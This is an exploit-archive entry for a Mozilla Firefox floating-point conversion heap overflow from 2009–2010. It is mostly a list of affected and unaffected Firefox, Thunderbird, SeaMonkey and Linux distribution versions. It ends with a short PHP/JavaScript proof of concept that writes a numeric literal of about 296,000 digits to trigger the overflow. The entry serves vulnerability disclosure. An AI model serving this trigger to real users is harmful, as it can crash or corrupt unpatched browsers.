Mozilla Firefox Floating Point Conversion Heap Overflow Vulnerability

2010-03-18T00:00:00
ID 1337DAY-ID-11360
Type zdt
Reporter n/a
Modified 2010-03-18T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
=====================================================================
Mozilla Firefox Floating Point Conversion Heap Overflow Vulnerability
=====================================================================

Vulnerable:
VMWare vMA 4.0
VMWare ESX Server 4.0
SuSE openSUSE 11.0
SuSE openSUSE 10.3
SuSE Linux 9
SuSE Linux 11
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_98
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_127
Sun OpenSolaris build snv_126
Sun OpenSolaris build snv_125
Sun OpenSolaris build snv_124
Sun OpenSolaris build snv_123
Sun OpenSolaris build snv_122
Sun OpenSolaris build snv_121
Sun OpenSolaris build snv_120
Sun OpenSolaris build snv_119
Sun OpenSolaris build snv_118
Sun OpenSolaris build snv_117
Sun OpenSolaris build snv_116
Sun OpenSolaris build snv_115
Sun OpenSolaris build snv_114
Sun OpenSolaris build snv_113
Sun OpenSolaris build snv_112
Sun OpenSolaris build snv_111a
Sun OpenSolaris build snv_111
Sun OpenSolaris build snv_110
Sun OpenSolaris build snv_109
Sun OpenSolaris build snv_108
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101a
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Slackware Linux 13.0 x86_64
Slackware Linux 13.0
Slackware Linux 12.2
Slackware Linux 12.0
Slackware Linux 11.0
Slackware Linux -current
S.u.S.E. SUSE Linux Enterprise Server 10 SP3
S.u.S.E. SUSE Linux Enterprise Server 10 SP2
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP3
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP2
S.u.S.E. SUSE Linux Enterprise 10 SP3 DEBUGINFO
S.u.S.E. SUSE Linux Enterprise 10 SP2 DEBUGINFO
S.u.S.E. SLES 11 DEBUGINFO
S.u.S.E. SLES 11
S.u.S.E. SLED 11
S.u.S.E. SLE SDK 10 SP3
S.u.S.E. SLE SDK 10 SP2
S.u.S.E. SLE 11
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. Linux 10.0
RedHat Fedora 11
RedHat Fedora 10
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux Optional Productivity Application 5.4.z server
RedHat Enterprise Linux Optional Productivity Application 5 server
RedHat Enterprise Linux ES 4.8.z
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4.8.z
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux Desktop version 4
RedHat Enterprise Linux 5 server
RedHat Desktop 4.0
RedHat Desktop 3.0
Pardus Linux 2009 0
Pardus Linux 2008 0
Mozilla Thunderbird 2.0 .9
Mozilla Thunderbird 2.0 .8
Mozilla Thunderbird 2.0 .6
Mozilla Thunderbird 2.0 .5
Mozilla Thunderbird 2.0 .4
Mozilla Thunderbird 2.0 .19
Mozilla Thunderbird 2.0 .17
Mozilla Thunderbird 2.0 .16
Mozilla Thunderbird 2.0 .15
Mozilla Thunderbird 2.0 .14
Mozilla Thunderbird 2.0 .13
Mozilla Thunderbird 2.0 .12
Mozilla Thunderbird 3.0
Mozilla Thunderbird 2.0.0.23
Mozilla Thunderbird 2.0.0.22
Mozilla Thunderbird 2.0.0.21
Mozilla Thunderbird 2.0.0.18
Mozilla Sunbird 0.9
Mozilla SeaMonkey 1.1.18
Mozilla SeaMonkey 1.1.17
Mozilla SeaMonkey 1.1.16
Mozilla SeaMonkey 1.1.15
Mozilla SeaMonkey 1.1.14
Mozilla SeaMonkey 1.1.13
Mozilla SeaMonkey 1.1.12
Mozilla SeaMonkey 1.1.11
Mozilla SeaMonkey 1.1.10
Mozilla SeaMonkey 1.1.9
Mozilla SeaMonkey 1.1.8
Mozilla SeaMonkey 1.1.7
Mozilla SeaMonkey 1.1.6
Mozilla SeaMonkey 1.1.5
Mozilla SeaMonkey 1.1.4
Mozilla SeaMonkey 1.1.3
Mozilla SeaMonkey 1.1.2
Mozilla SeaMonkey 1.1.1
Mozilla SeaMonkey 1.1 beta
Mozilla Firefox 3.5.3
Mozilla Firefox 3.5.2
Mozilla Firefox 3.5.1
Mozilla Firefox 3.5
Mozilla Firefox 3.0.14
Mozilla Firefox 3.0.13
Mozilla Firefox 3.0.12
Mozilla Firefox 3.0.11
Mozilla Firefox 3.0.10
Mozilla Firefox 3.0.9
Mozilla Firefox 3.0.8
Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 3.0
Mozilla Camino 1.6.9
MandrakeSoft Linux Mandrake 2010.0 x86_64
MandrakeSoft Linux Mandrake 2010.0
MandrakeSoft Linux Mandrake 2009.1 x86_64
MandrakeSoft Linux Mandrake 2009.1
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
K-Meleon K-Meleon 1.5.3
Flock Flock 2.5.2
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0
Avaya Voice Portal 4.1
Avaya Voice Portal 4.0
Avaya Messaging Storage Server 5.0
Avaya Messaging Storage Server 4.0
Avaya Message Networking MN 3.1
Avaya Message Networking 3.1
Avaya Message Networking
Avaya Intuity AUDIX LX 2.0 SP2
Avaya Intuity AUDIX LX 2.0 SP1
Avaya Intuity AUDIX LX 2.0

Not Vulnerable:
VMWare ESX Server 4.0 ESX400-200912403
Sun OpenSolaris build snv_128
Mozilla Thunderbird 2.0 24
Mozilla SeaMonkey 1.1.19
Mozilla Firefox 3.5.4
Mozilla Firefox 3.0.15
Mozilla Camino 2.0
Flock Flock 2.5.5 

The following proof of concept PHP code is available:

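<!-- PHP emits a JavaScript numeric literal "0." followed by 296450 "1" digits,
     which the browser must convert from a string to a floating point value. -->
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>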


